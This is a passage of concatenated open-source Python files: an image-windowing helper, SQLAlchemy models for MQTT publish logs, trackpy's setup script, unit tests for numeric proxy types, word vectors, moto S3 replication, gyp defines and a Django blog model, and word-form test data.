h_overlap = 0
row = hi*side
row_end = row+side
if row_end > H:
if self.void_overlap:
h_overlap = row - (H-side)
row = H - side
row_end = H
for wi in range(n_w):
w_overlap = 0
col = wi*side
col_end = col+side
if col_end > W:
if self.void_overlap:
w_overlap = col - (W-side)
col = W - side
col_end = W
Xrc = X[row:row_end, col:col_end]
Yrc = Y[row:row_end, col:col_end].copy()
if h_overlap > 0:
Yrc[:h_overlap, :] = void
if w_overlap > 0:
Yrc[:, :w_overlap] = void
yield [Xrc, Yrc]
def size(self):
if not self.slide_all:
return len(self.X)
if self.slide_all_size is None:
H, W = self.X.shape[1], self.X.shape[2]
side = self.slide_window_size
n_h = H // side + int(H % side !=0)
n_w = W // side + int(W % side !=0)
self.slide_all_size = n_h * n_w * len(self.X)
return self.slide_all_size
def stitch_sliding_images(self, l_imgs):
"""
The l_imgs should be probability distribution of labels.
"""
side = self.slide_window_size
H,W = (Camvid.data_shape[0], Camvid.data_shape[1])
n_h = H // side + int(H % side != 0)
n_w = W // side + int(W % side != 0)
assert n_h * n_w == len(l_imgs), len(l_imgs)
n_ch = len(l_imgs[0].reshape([-1])) / side **2
assert n_ch > 1, n_ch
image = np.zeros((H, W, n_ch))
i = -1
for hi in range(n_h):
row = hi * side
row_end = row+side
if row_end > H:
row_end = H
row = H - side
for wi in range(n_w):
col = wi*side
col_end = col+side
if col_end > W:
col_end = W
col = W - side
i+=1
r_ = row_end - row
c_ = col_end - col
window = l_imgs[i].reshape([side, side, n_ch])
image[row:row_end, col:col_end] += window
return image
|
server/app/services/publish/models.py | goodfree/ActorCloud | 173 | 12664627 | <reponame>goodfree/ActorCloud
from sqlalchemy import func
from sqlalchemy.dialects.postgresql import JSONB
from actor_libs.database.orm import BaseModel, db, ModelMixin
__all__ = ['PublishLog', 'TimerPublish']
class PublishLog(ModelMixin, db.Model):
"""
controlType: 1:Publish,2:Read,3:Write,4 Execute
publishStatus: 0:Failed,1:Published 2:Arrived
"""
__tablename__ = 'publish_logs'
__table_args__ = (
db.Index('publish_logs_msgTime_idx', "msgTime"),
)
topic = db.Column(db.String(1000)) # mqtt topic
streamID = db.Column(db.String(1000)) # stream id
payload = db.Column(JSONB) # publish payload
publishStatus = db.Column(db.SmallInteger)
taskID = db.Column(db.String(64))
msgTime = db.Column(db.DateTime, server_default=func.now(), primary_key=True)
deviceID = db.Column(db.String, primary_key=True) # device uid
tenantID = db.Column(db.String, primary_key=True) # tenant uid
class TimerPublish(BaseModel):
__tablename__ = 'timer_publish'
taskName = db.Column(db.String) # 任务名
taskStatus = db.Column(db.SmallInteger, server_default='2') # 任务状态2 执行 3 成功
timerType = db.Column(db.SmallInteger) # 定时类型1 固定 , 2 间隔
topic = db.Column(db.String(1000)) # 主题(mqtt)
payload = db.Column(JSONB) # 下发消息内容
intervalTime = db.Column(JSONB) # 间隔时间{'weekday': 'hour': 'minute'}
crontabTime = db.Column(db.DateTime) # 指定下发时间
deviceIntID = db.Column(db.Integer, db.ForeignKey(
'devices.id', onupdate="CASCADE", ondelete="CASCADE")) # 设备id
userIntID = db.Column(db.Integer, db.ForeignKey(
'users.id', onupdate="CASCADE", ondelete="CASCADE")) # 用户
|
setup.py | freemansw1/trackpy | 315 | 12664645 | <gh_stars>100-1000
import os
import versioneer
from setuptools import setup
try:
descr = open(os.path.join(os.path.dirname(__file__), 'README.md')).read()
except OSError:
descr = ''
# In some cases, the numpy include path is not present by default.
# Let's try to obtain it.
try:
import numpy
except ImportError:
ext_include_dirs = []
else:
ext_include_dirs = [numpy.get_include(),]
setup_parameters = dict(
name = "trackpy",
version = versioneer.get_version(),
cmdclass = versioneer.get_cmdclass(),
description = "particle-tracking toolkit",
author = "Trackpy Contributors",
author_email = "<EMAIL>",
url = "https://github.com/soft-matter/trackpy",
install_requires = ['numpy>=1.14', 'scipy>=1.1', 'pandas>=0.22', 'pyyaml', 'matplotlib'],
python_requires=">=3.6",
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
packages = ['trackpy', 'trackpy.refine', 'trackpy.linking', 'trackpy.locate_functions'],
long_description = descr,
long_description_content_type='text/markdown'
)
setup(**setup_parameters)
|
descarteslabs/workflows/types/primitives/tests/test_number.py | descarteslabs/descarteslabs-python | 167 | 12664652 | import operator
import pytest
import numpy as np
from ...core import ProxyTypeError
from ...containers import Tuple, List
from ...identifier import parameter
from ..bool_ import Bool
from ..string import Str
from ..number import Float, Int, Number, _binop_result
from ...core.tests.utils import operator_test
class TestPromote(object):
def test_number_unpromotable(self):
with pytest.raises(ProxyTypeError):
Number._promote(2.2)
with pytest.raises(ProxyTypeError):
Number._promote(0)
def test_primitives(self):
assert isinstance(Int._promote(0), Int)
assert isinstance(Float._promote(2), Float)
assert isinstance(Float._promote(2.2), Float)
def test_proxytypes(self):
assert isinstance(Int._promote(Int(0)), Int)
assert isinstance(Float._promote(Float(2.2)), Float)
def test_wrong_primitives(self):
with pytest.raises(ProxyTypeError):
Int._promote(2.2)
def test_wrong_proxytypes(self):
with pytest.raises(
ProxyTypeError, match=r"You need to convert it explicitly, like `Int\(x\)`"
):
Int._promote(Float(2.2))
with pytest.raises(
ProxyTypeError,
match=r"You need to convert it explicitly, like `Float\(x\)`",
):
Float._promote(Int(0))
class TestConstruct(object):
def test_explicit_cast_passthrough(self):
i = Int(Int(1))
assert i.graft[i.graft["returns"]] == 1
assert i.params == ()
x = parameter("x", Int)
i = Int(x)
assert i.params == (x,)
def test_explicit_cast_to_int(self):
i = Int(Float(1.0))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Float)
i = Int(x)
assert i.params == (x,)
i = Int(Bool(True))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Bool)
i = Int(x)
assert i.params == (x,)
i = Int(Str("1"))
assert isinstance(i, Int)
assert i.graft[i.graft["returns"]][0] == "wf.Int.cast"
assert i.params == ()
x = parameter("x", Str)
i = Int(x)
assert i.params == (x,)
def test_explicit_cast_to_float(self):
f = Float(Int(1))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Int)
f = Float(x)
assert f.params == (x,)
f = Float(Bool(True))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Bool)
f = Float(x)
assert f.params == (x,)
f = Float(Str("1"))
assert isinstance(f, Float)
assert f.graft[f.graft["returns"]][0] == "wf.Float.cast"
assert f.params == ()
x = parameter("x", Str)
f = Float(x)
assert f.params == (x,)
class TestNumPyScalars(object):
@pytest.mark.parametrize(
"val",
[
np.uint8(1),
np.uint16(1),
np.uint32(1),
np.uint64(1),
np.int8(1),
np.int16(1),
np.int32(1),
np.int64(1),
],
)
def test_int(self, val):
i = Int(val)
assert isinstance(i.graft[i.graft["returns"]], int)
assert i.params == ()
@pytest.mark.parametrize("val", [np.float16(1), np.float32(1), np.float64(1)])
def test_float(self, val):
i = Float(val)
assert isinstance(i.graft[i.graft["returns"]], float)
assert i.params == ()
def test_failure(self):
with pytest.raises(TypeError):
Float(np.int32(1))
with pytest.raises(TypeError):
Int(np.float64(1))
with pytest.raises(TypeError):
Int(np.datetime64("2020-01-01"))
@pytest.mark.parametrize(
"a, b, expected",
[
(Int(0), Int(0), Int),
(Float(0.0), Float(0.0), Float),
(Int(0), Float(0.0), Float),
(Float(0.0), Int(0), Float),
],
)
def test_binop_result(a, b, expected):
assert _binop_result(a, b) == expected
class TestAllOperators(object):
int_obj = Int(0)
float_obj = Float(0.0)
all_values_to_try = [Int(1), Float(2.2), Bool(True), List[Int]([1, 2])]
# ^ we use pre-promoted Proxytypes, not py types, since the `operator_test`
# helper checks if `type(value) is in accepted_types`
@pytest.mark.parametrize(
"operator, accepted_types, return_type",
[
["__abs__", (), Int],
["__add__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__div__", (Int, Float, Bool), (Int, Float)],
[
"__divmod__",
(Int, Float, Bool),
{
Float: Tuple[Float, Float],
Int: Tuple[Int, Int],
Bool: Tuple[Int, Int],
},
],
["__eq__", (Int, Float, Bool), Bool],
["__floordiv__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__ge__", (Int, Float, Bool), Bool],
["__gt__", (Int, Float, Bool), Bool],
["__invert__", (), Int],
["__le__", (Int, Float, Bool), Bool],
["__lt__", (Int, Float, Bool), Bool],
["__mod__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__mul__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__ne__", (Int, Float, Bool), Bool],
["__neg__", (), Int],
["__pos__", (), Int],
["__pow__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__radd__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rdiv__", (Int, Float, Bool), (Int, Float)],
[
"__rdivmod__",
(Int, Float, Bool),
{
Float: Tuple[Float, Float],
Int: Tuple[Int, Int],
Bool: Tuple[Int, Int],
},
],
["__rfloordiv__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rmod__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rmul__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rpow__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rsub__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__rtruediv__", (Int, Float, Bool), (Int, Float)],
["__sub__", (Int, Float, Bool), {Float: Float, Int: Int, Bool: Int}],
["__truediv__", (Int, Float, Bool), (Int, Float)],
# Int-specific methods
["__and__", [Int, Bool], Int],
["__lshift__", [Int, Bool], Int],
["__or__", [Int, Bool], Int],
["__rand__", [Int, Bool], Int],
["__rlshift__", [Int, Bool], Int],
["__ror__", [Int, Bool], Int],
["__rrshift__", [Int, Bool], Int],
["__rshift__", [Int, Bool], Int],
["__rxor__", [Int, Bool], Int],
["__xor__", [Int, Bool], Int],
],
)
def test_all_operators_int(self, operator, accepted_types, return_type):
operator_test(
self.int_obj, self.all_values_to_try, operator, accepted_types, return_type
)
@pytest.mark.parametrize(
"operator, accepted_types, return_type",
[
["__abs__", (), Float],
["__add__", (Int, Float, Bool), Float],
["__div__", (Int, Float, Bool), Float],
["__divmod__", (Int, Float, Bool), Tuple[Float, Float]],
["__eq__", (Int, Float, Bool), Bool],
["__floordiv__", (Int, Float, Bool), Float],
["__ge__", (Int, Float, Bool), Bool],
["__gt__", (Int, Float, Bool), Bool],
["__invert__", (), Float],
["__le__", (Int, Float, Bool), Bool],
["__lt__", (Int, Float, Bool), Bool],
["__mod__", (Int, Float, Bool), Float],
["__mul__", (Int, Float, Bool), Float],
["__ne__", (Int, Float, Bool), Bool],
["__neg__", (), Float],
["__pos__", (), Float],
["__pow__", (Int, Float, Bool), Float],
["__radd__", (Int, Float, Bool), Float],
["__rdiv__", (Int, Float, Bool), Float],
["__rdivmod__", (Int, Float, Bool), Tuple[Float, Float]],
["__rfloordiv__", (Int, Float, Bool), Float],
["__rmod__", (Int, Float, Bool), Float],
["__rmul__", (Int, Float, Bool), Float],
["__rpow__", (Int, Float, Bool), Float],
["__rsub__", (Int, Float, Bool), Float],
["__rtruediv__", (Int, Float, Bool), Float],
["__sub__", (Int, Float, Bool), Float],
["__truediv__", (Int, Float, Bool), Float],
],
)
def test_all_operators_float(self, operator, accepted_types, return_type):
operator_test(
self.float_obj,
self.all_values_to_try,
operator,
accepted_types,
return_type,
)
@pytest.mark.parametrize("obj", [Int(0), Float(2.2)])
@pytest.mark.parametrize(
"op, exception",
[(operator.truth, TypeError), (operator.index, TypeError), (hex, TypeError)],
)
def test_unsupported_unary_methods(self, obj, op, exception):
with pytest.raises(exception):
op(obj)
|
keras_image_captioning/word_vectors_test.py | ashishpatel26/keras-image-captioning | 116 | 12664655 | <filename>keras_image_captioning/word_vectors_test.py
import pytest
from .preprocessors import CaptionPreprocessor
from .word_vectors import Glove, Fasttext
class WordVectorTestBase(object):
_WORD_VECTOR = None
@pytest.fixture
def word_vector(self, mocker):
mocker.patch.object(self._WORD_VECTOR, '_PRETRAINED_PATH',
self._WORD_VECTOR._PRETRAINED_PATH + '.sample')
vocab_words = ['.', 'znotexistz', 'a', 'i']
initializer = 'zeros'
word_vector = self._WORD_VECTOR(vocab_words=vocab_words,
initializer=initializer)
return word_vector
def test___init__(self, word_vector):
EOS_TOKEN = CaptionPreprocessor.EOS_TOKEN
word_vector_of = word_vector._word_vector_of
assert len(word_vector_of) == 3 # Not including znotexistz
assert '.' not in word_vector_of
assert 'znotexistz' not in word_vector_of
assert EOS_TOKEN in word_vector_of
assert 'a' in word_vector_of
assert 'i' in word_vector_of
def test_vectorize_words(self, word_vector):
EOS_TOKEN = CaptionPreprocessor.EOS_TOKEN
vectors = word_vector.vectorize_words(['qnotexistq', 'znotexistz', EOS_TOKEN,
'a'])
assert not vectors[:2].any() # Assert all zeros
assert vectors[2:].all() # Assert all non-zeros
class TestGlove(WordVectorTestBase):
_WORD_VECTOR = Glove
class TestFasttext(WordVectorTestBase):
_WORD_VECTOR = Fasttext
|
tests/test_s3/test_s3_replication.py | gtourkas/moto | 5,460 | 12664666 | <filename>tests/test_s3/test_s3_replication.py
import boto3
import pytest
import sure # noqa # pylint: disable=unused-import
from botocore.exceptions import ClientError
from moto import mock_s3
from uuid import uuid4
DEFAULT_REGION_NAME = "us-east-1"
@mock_s3
def test_get_bucket_replication_for_unexisting_bucket():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("NoSuchBucket")
err["Message"].should.equal("The specified bucket does not exist")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_get_bucket_replication_bucket_without_replication():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("ReplicationConfigurationNotFoundError")
err["Message"].should.equal("The replication configuration was not found")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_delete_bucket_replication_unknown_bucket():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
with pytest.raises(ClientError) as exc:
s3.delete_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("NoSuchBucket")
err["Message"].should.equal("The specified bucket does not exist")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_delete_bucket_replication_bucket_without_replication():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
# No-op
s3.delete_bucket_replication(Bucket=bucket_name)
@mock_s3
def test_create_replication_without_versioning():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
with pytest.raises(ClientError) as exc:
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{"Destination": {"Bucket": "secondbucket"}, "Status": "Enabled"}
],
},
)
err = exc.value.response["Error"]
err["Code"].should.equal("InvalidRequest")
err["Message"].should.equal(
"Versioning must be 'Enabled' on the bucket to apply a replication configuration"
)
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_create_and_retrieve_replication_with_single_rules():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
s3.put_bucket_versioning(
Bucket=bucket_name, VersioningConfiguration={"Status": "Enabled"}
)
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{
"ID": "firstrule",
"Priority": 2,
"Destination": {"Bucket": "secondbucket"},
"Status": "Enabled",
}
],
},
)
config = s3.get_bucket_replication(Bucket=bucket_name)["ReplicationConfiguration"]
config.should.equal(
{
"Role": "myrole",
"Rules": [
{
"DeleteMarkerReplication": {"Status": "Disabled"},
"Destination": {"Bucket": "secondbucket"},
"Filter": {"Prefix": ""},
"ID": "firstrule",
"Priority": 2,
"Status": "Enabled",
}
],
}
)
s3.delete_bucket_replication(Bucket=bucket_name)
# Can't retrieve replication that has been deleted
with pytest.raises(ClientError) as exc:
s3.get_bucket_replication(Bucket=bucket_name)
err = exc.value.response["Error"]
err["Code"].should.equal("ReplicationConfigurationNotFoundError")
err["Message"].should.equal("The replication configuration was not found")
err["BucketName"].should.equal(bucket_name)
@mock_s3
def test_create_and_retrieve_replication_with_multiple_rules():
bucket_name = str(uuid4())
s3 = boto3.client("s3", region_name=DEFAULT_REGION_NAME)
s3.create_bucket(Bucket=bucket_name)
s3.put_bucket_versioning(
Bucket=bucket_name, VersioningConfiguration={"Status": "Enabled"}
)
s3.put_bucket_replication(
Bucket=bucket_name,
ReplicationConfiguration={
"Role": "myrole",
"Rules": [
{"Destination": {"Bucket": "secondbucket"}, "Status": "Enabled"},
{
"ID": "secondrule",
"Priority": 2,
"Destination": {"Bucket": "thirdbucket"},
"Status": "Disabled",
},
],
},
)
config = s3.get_bucket_replication(Bucket=bucket_name)["ReplicationConfiguration"]
config.should.have.key("Role").equal("myrole")
rules = config["Rules"]
rules.should.have.length_of(2)
first_rule = rules[0]
first_rule.should.have.key("ID")
first_rule.should.have.key("Priority").equal(1)
first_rule.should.have.key("Status").equal("Enabled")
first_rule.should.have.key("Destination").equal({"Bucket": "secondbucket"})
second = rules[1]
second.should.have.key("ID").equal("secondrule")
second.should.have.key("Priority").equal(2)
second.should.have.key("Status").equal("Disabled")
second.should.have.key("Destination").equal({"Bucket": "thirdbucket"})
|
deps/npm/node_modules/node-gyp/gyp/test/gyp-defines/gyptest-regyp.py | loganfsmyth/node | 140 | 12664675 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that when the same value is repeated for a gyp define, duplicates are
stripped from the regeneration rule.
"""
import os
import TestGyp
# Regenerating build files when a gyp file changes is currently only supported
# by the make and Android generators.
test = TestGyp.TestGyp(formats=['make', 'android'])
os.environ['GYP_DEFINES'] = 'key=repeated_value key=value1 key=repeated_value'
test.run_gyp('defines.gyp')
test.build('defines.gyp')
# The last occurrence of a repeated set should take precedence over other
# values. See gyptest-multiple-values.py.
test.must_contain('action.txt', 'repeated_value')
# So the regeneration rule needs to use the correct order.
test.must_not_contain(
'Makefile', '"-Dkey=repeated_value" "-Dkey=value1" "-Dkey=repeated_value"')
test.must_contain('Makefile', '"-Dkey=value1" "-Dkey=repeated_value"')
# Sleep so that the changed gyp file will have a newer timestamp than the
# previously generated build files.
test.sleep()
os.utime("defines.gyp", None)
test.build('defines.gyp')
test.must_contain('action.txt', 'repeated_value')
test.pass_test()
|
blogs/tests/test_models.py | ewjoachim/pythondotorg | 911 | 12664688 | from django.test import TestCase
from django.utils import timezone
from ..models import BlogEntry, Feed
class BlogModelTest(TestCase):
def test_blog_entry(self):
now = timezone.now()
b = BlogEntry.objects.create(
title='Test Entry',
summary='Test Summary',
pub_date=now,
url='http://www.revsys.com',
feed=Feed.objects.create(
name='psf blog',
website_url='psf.example.org',
feed_url='feed.psf.example.org',
)
)
self.assertEqual(str(b), b.title)
self.assertEqual(b.get_absolute_url(), b.url)
|
test_values.py | tomaarsen/word_forms | 570 | 12664719 | # Test values must be in the form [(text_input, expected_output), (text_input, expected_output), ...]
test_values = [
(
"president",
{
"n": {
"president",
"presidentship",
"presidencies",
"presidency",
"presidentships",
"presidents",
},
"r": {"presidentially"},
"a": {"presidential"},
"v": {"presiding", "presides", "preside", "presided"},
},
),
(
"elect",
{
"n": {
"elector",
"elects",
"electors",
"elective",
"electorates",
"elect",
"electives",
"elections",
"electorate",
"eligibility",
"election",
"eligibilities",
},
"r": set(),
"a": {"elect", "electoral", "elective", "eligible"},
"v": {"elect", "elects", "electing", "elected"},
},
),
(
"running",
{
"n": {
"runninesses",
"runnings",
"runs",
"running",
"runniness",
"runners",
"runner",
"run",
},
"a": {"running", "runny"},
"v": {"running", "ran", "runs", "run"},
"r": set(),
},
),
(
"run",
{
"n": {
"runninesses",
"runnings",
"runs",
"running",
"runniness",
"runners",
"runner",
"run",
},
"a": {"running", "runny"},
"v": {"running", "ran", "runs", "run"},
"r": set(),
},
),
(
"operations",
{
"n": {
"operators",
"operations",
"operation",
"operative",
"operator",
"operatives",
},
"a": {"operant", "operative"},
"v": {"operated", "operating", "operate", "operates"},
"r": {"operatively"},
},
),
(
"operate",
{
"n": {
"operators",
"operations",
"operation",
"operative",
"operator",
"operatives",
},
"a": {"operant", "operative"},
"v": {"operated", "operating", "operate", "operates"},
"r": {"operatively"},
},
),
(
"invest",
{
"n": {
"investitures",
"investors",
"investiture",
"investor",
"investments",
"investings",
"investment",
"investing",
},
"a": set(),
"v": {"invested", "invests", "invest", "investing"},
"r": set(),
},
),
(
"investments",
{
"n": {
"investitures",
"investors",
"investiture",
"investor",
"investments",
"investings",
"investment",
"investing",
},
"a": set(),
"v": {"invested", "invests", "invest", "investing"},
"r": set(),
},
),
(
"conjugation",
{
"n": {"conjugate", "conjugation", "conjugates", "conjugations"},
"a": {"conjugate"},
"v": {"conjugating", "conjugated", "conjugate", "conjugates"},
"r": set(),
},
),
(
"do",
{
"n": {"does", "doer", "doers", "do"},
"a": set(),
"v": {
"doing",
"don't",
"does",
"didn't",
"do",
"doesn't",
"done",
"did",
},
"r": set(),
},
),
(
"word",
{
"n": {"words", "word", "wordings", "wording"},
"a": set(),
"v": {"words", "word", "worded", "wording"},
"r": set(),
},
),
(
"love",
{
"a": {"lovable", "loveable"},
"n": {"love", "lover", "lovers", "loves"},
"r": set(),
"v": {"love", "loved", "loves", "loving"},
},
),
(
"word",
{
"n": {"words", "word", "wordings", "wording"},
"a": set(),
"v": {"words", "word", "worded", "wording"},
"r": set(),
},
),
(
"verb",
{
"n": {"verbs", "verb"},
"a": {"verbal"},
"v": {"verbifying", "verbified", "verbify", "verbifies"},
"r": {"verbally"},
},
),
(
"genetic",
{
"n": {"geneticist", "genetics", "geneticists", "genes", "gene"},
"a": {"genic", "genetic", "genetical"},
"v": set(),
"r": {"genetically"},
},
),
(
"politician",
{
"r": {"politically"},
"a": {"political"},
"n": {"politician", "politicians", "politics"},
"v": set(),
},
),
(
"death",
{
"n": {"death", "dying", "deaths", "die", "dyings", "dice"},
"a": {"dying", "deathly"},
"v": {"died", "die", "dying", "dies"},
"r": {"deathly"},
},
),
(
"attitude",
{
"n": {"attitudes", "attitude"},
"a": set(),
"v": {
"attitudinise",
"attitudinized",
"attitudinize",
"attitudinizes",
"attitudinizing",
},
"r": set(),
},
),
(
"cheek",
{
"n": {"cheek", "cheekinesses", "cheeks", "cheekiness"},
"a": {"cheeky"},
"v": {"cheek", "cheeks", "cheeked", "cheeking"},
"r": {"cheekily"},
},
),
(
"world",
{
"n": {"worldliness", "world", "worldlinesses", "worlds"},
"a": {"worldly", "world"},
"v": set(),
"r": set(),
},
),
("lake", {"n": {"lake", "lakes"}, "a": set(), "v": set(), "r": set()}),
(
"guitar",
{
"n": {"guitarist", "guitarists", "guitar", "guitars"},
"a": set(),
"v": set(),
"r": set(),
},
),
(
"presence",
{
"n": {
"presenter",
"present",
"presents",
"presentness",
"presenters",
"presentnesses",
"presentments",
"presentations",
"presences",
"presence",
"presentment",
"presentation",
},
"a": {"present"},
"v": {"present", "presents", "presenting", "presented"},
"r": {"presently"},
},
),
(
"enthusiasm",
{
"n": {"enthusiasm", "enthusiasms"},
"a": {"enthusiastic"},
"v": set(),
"r": {"enthusiastically"},
},
),
(
"organization",
{
"n": {"organizers", "organization", "organizations", "organizer"},
"a": set(),
"v": {"organize", "organized", "organizing", "organizes"},
"r": set(),
},
),
(
"player",
{
"n": {
"plays",
"playlet",
"playings",
"players",
"playing",
"playlets",
"play",
"player",
},
"a": set(),
"v": {"plays", "play", "playing", "played"},
"r": set(),
},
),
(
"transportation",
{
"n": {
"transporters",
"transportation",
"transportations",
"transporter",
"transport",
"transports",
},
"a": set(),
"v": {"transport", "transporting", "transports", "transported"},
"r": set(),
},
),
(
"television",
{
"n": {"televisions", "television"},
"a": set(),
"v": {"televising", "televise", "televises", "televised"},
"r": set(),
},
),
(
"cousin",
{"n": {"cousins", "cousin"}, "a": {"cousinly"}, "v": set(), "r": set()},
),
(
"ability",
{"n": {"abilities", "ability"}, "a": {"able"}, "v": set(), "r": {"ably"}},
),
("chapter", {"n": {"chapters", "chapter"}, "a": set(), "v": set(), "r": set()}),
(
"appearance",
{
"n": {
"appearances",
"apparitions",
"appearance",
"apparencies",
"apparentness",
"apparentnesses",
"apparition",
"apparency",
},
"a": {"apparent"},
"v": {"appears", "appeared", "appear", "appearing"},
"r": {"apparently"},
},
),
(
"drawing",
{
"n": {
"drawings",
"drawers",
"draws",
"drawer",
"drawees",
"drawee",
"draw",
"drawing",
},
"a": set(),
"v": {"draws", "drew", "drawn", "draw", "drawing"},
"r": set(),
},
),
(
"university",
{"n": {"university", "universities"}, "a": set(), "v": set(), "r": set()},
),
(
"performance",
{
"n": {
"performings",
"performing",
"performances",
"performance",
"performer",
"performers",
},
"a": set(),
"v": {"performs", "performing", "performed", "perform"},
"r": set(),
},
),
("revenue", {"n": {"revenue", "revenues"}, "a": set(), "v": set(), "r": set()}),
# Some Verbs
(
"cling",
{
"n": {"cling", "clings"},
"a": set(),
"v": {"clung", "cling", "clinging", "clings"},
"r": set(),
},
),
(
"decrease",
{
"n": {"decrease", "decreases"},
"a": set(),
"v": {"decrease", "decreases", "decreased", "decreasing"},
"r": set(),
},
),
(
"wonder",
{
"n": {
"wonder",
"wonderment",
"wonderments",
"wonders",
"wonderers",
"wonderer",
},
"a": {"wondrous"},
"v": {"wondering", "wonder", "wonders", "wondered"},
"r": {"wondrous", "wondrously"},
},
),
(
"rest",
{
"n": {"rest", "rests", "resters", "rester"},
"a": set(),
"v": {"rest", "rests", "resting", "rested"},
"r": set(),
},
),
(
"mutter",
{
"n": {
"mutterer",
"mutterers",
"muttering",
"mutter",
"mutterings",
"mutters",
},
"a": set(),
"v": {"muttering", "muttered", "mutters", "mutter"},
"r": set(),
},
),
(
"implement",
{
"n": {"implementations", "implement", "implements", "implementation"},
"a": {"implemental"},
"v": {"implemented", "implement", "implements", "implementing"},
"r": set(),
},
),
(
"evolve",
{
"n": {"evolution", "evolutions"},
"a": {"evolutionary"},
"v": {"evolved", "evolve", "evolves", "evolving"},
"r": {"evolutionarily"},
},
),
(
"allocate",
{
"n": {"allocations", "allocators", "allocation", "allocator"},
"a": {"allocable", "allocatable"},
"v": {"allocating", "allocates", "allocated", "allocate"},
"r": set(),
},
),
(
"flood",
{
"n": {"flood", "flooding", "floodings", "floods"},
"a": set(),
"v": {"flooding", "flooded", "flood", "floods"},
"r": set(),
},
), # Should there be `flooded` in 'a' here?
(
"bow",
{
"n": {"bows", "bow"},
"a": set(),
"v": {"bows", "bowing", "bowed", "bow"},
"r": set(),
},
),
(
"advocate",
{
"n": {
"advocates",
"advocator",
"advocacy",
"advocacies",
"advocators",
"advocate",
},
"a": set(),
"v": {"advocates", "advocating", "advocated", "advocate"},
"r": set(),
},
),
(
"divert",
{
"n": {"diversions", "diversionists", "diversionist", "diversion"},
"a": {"diversionary"},
"v": {"diverted", "diverts", "divert", "diverting"},
"r": set(),
},
),
# Some adjectives
(
"sweet",
{
"n": {"sweetnesses", "sweets", "sweetness", "sweet"},
"a": {"sweet"},
"v": set(),
"r": {"sweet", "sweetly"},
},
),
(
"glossy",
{
"n": {"glossiness", "glossy", "glossies", "glossinesses"},
"a": {"glossy"},
"v": set(),
"r": {"glossily"},
},
),
(
"relevant",
{
"n": {"relevancies", "relevance", "relevancy", "relevances"},
"a": {"relevant"},
"v": set(),
"r": {"relevantly"},
},
),
(
"aloof",
{"n": {"aloofnesses", "aloofness"}, "a": {"aloof"}, "v": set(), "r": {"aloof"}},
),
(
"therapeutic",
{
"n": {
"therapists",
"therapies",
"therapy",
"therapist",
"therapeutic",
"therapeutics",
},
"a": {"therapeutical", "therapeutic"},
"v": set(),
"r": {"therapeutically"},
},
),
(
"obviously",
{
"n": {"obviousnesses", "obviousness"},
"a": {"obvious"},
"v": set(),
"r": {"obviously"},
},
),
(
"jumpy",
{
"n": {"jumpings", "jumpiness", "jumpinesses", "jump", "jumping", "jumps"},
"a": {"jumpy"},
"v": {"jump", "jumping", "jumped", "jumps"},
"r": set(),
},
),
(
"venomous",
{"n": {"venom", "venoms"}, "a": {"venomous"}, "v": set(), "r": {"venomously"}},
),
(
"laughable",
{
"n": {"laugher", "laughs", "laughers", "laugh"},
"a": {"laughable"},
"v": {"laughing", "laughs", "laughed", "laugh"},
"r": {"laughably"},
},
),
(
"demonic",
{
"n": {"demons", "demon", "demonizations", "demonization"},
"a": {"demonic"},
"v": {"demonized", "demonizing", "demonizes", "demonize"},
"r": set(),
},
),
(
"knotty",
{
"n": {"knot", "knottiness", "knots", "knottinesses"},
"a": {"knotty"},
"v": {"knotted", "knotting", "knots", "knot"},
"r": set(),
},
), # Is `knottinesses` a valid plural?
(
"little",
{
"n": {"little", "littlenesses", "littles", "littleness"},
"a": {"little"},
"v": set(),
"r": {"little"},
},
